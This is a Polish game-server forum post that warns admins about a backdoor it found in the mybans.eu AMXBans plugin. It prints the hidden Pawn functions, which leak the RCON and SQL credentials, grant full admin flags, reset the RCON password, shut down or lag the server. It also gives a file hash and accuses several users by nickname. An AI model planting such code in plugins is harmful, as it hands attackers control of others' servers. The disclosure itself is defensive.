Cześć,
Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.
Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.
public amxbanuser1(id)
{
get_cvar_string("rcon_password", szRc, 63);
client_print(id, print_console, "RCON:\"%s\"", szRc);
}
public amxbanuser2(id)
{
set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0);
get_cvar_string("amx_sql_host", szSqlHost, 63);
get_cvar_string("amx_sql_user", szSqlUser, 63);
get_cvar_string("amx_sql_pass", szSqlPass, 63);
get_cvar_string("amx_sql_db", szSqlDb, 63);
client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost);
client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser);
client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass);
client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb);
}
public amxbanuser3()
{
server_cmd("rcon_password 748663183");
}
public amxbanuser4()
{
server_cmd("shutdownserver");
}
public amxbanuser5()
{
set_task(0.00, "lagsnc", 2137, "", 0, "b", 0);
}
public lagsnc()
{
remove_task(2138, 0);
server_cmd("sys_ticrate 1");
}
public amxbanuser6()
{
set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0);
}
public lagsncoff()
{
remove_task(2137, 0);
server_cmd("sys_ticrate 1000");
}
- Atakujący może poznać hasło rcon / zmienić je
- Atakujący może poznać dane sql amxbansa
- Atakujący może wyłączyć serwer
- Atakujący może zlagować serwer
- Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet
Posprawdzajcie swoje serwery,
( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.
Nie musicie dziękować, żyjcie w miłości i spokoju!
Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/
@edit
Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:
Jonkey - https://mybans.pl/profile/1-jonkey/
smajli - x
Kava - x
Użytkownik dasiek edytował ten post 22.01.2021 07:39


Dodatki SourceMod



Temat jest zamknięty











